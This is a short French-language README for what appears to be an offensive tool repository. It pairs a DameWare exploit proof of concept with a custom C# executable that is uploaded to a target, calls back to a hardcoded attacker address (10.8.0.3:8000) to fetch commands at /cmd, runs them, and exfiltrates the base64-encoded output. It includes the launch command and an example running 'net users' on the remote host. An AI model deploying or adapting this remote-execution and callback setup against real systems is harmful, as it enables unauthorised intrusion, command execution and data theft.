
Ce dépôt a été créé pour utiliser le POC Nessus avec un exécutable C# personnalisé afin d'exécuter des commandes sur un hôte distant et d'obtenir la sortie de la commande.
Le fichier python est utilisé pour démarrer un serveur web, exécuter l'exploit, puis récupérer les résultats via le serveur web.
L'exe C# est téléversé sur la cible via l'exploit.
Lorsqu'il est exécuté sur la cible, l'exe rappelle l'IP/le port spécifié pour obtenir la commande à exécuter (le chemin est /cmd).
Une fois la commande terminée, l'exe envoie la sortie au même serveur web.
L'envoi de la sortie se fait via une requête GET qui générera une 404, mais c'est sans importance, nous voulons simplement les données base64.
L'exe C# contient deux variables qui doivent être mises à jour
Ces variables font référence à l'IP et au port du système attaquant
string ip = "10.8.0.3";
string port = "8000";
python dameware-poc.py -t target_ip -e executable_to_upload
L'exemple ci-dessous exécute la commande net users sur l'hôte distant
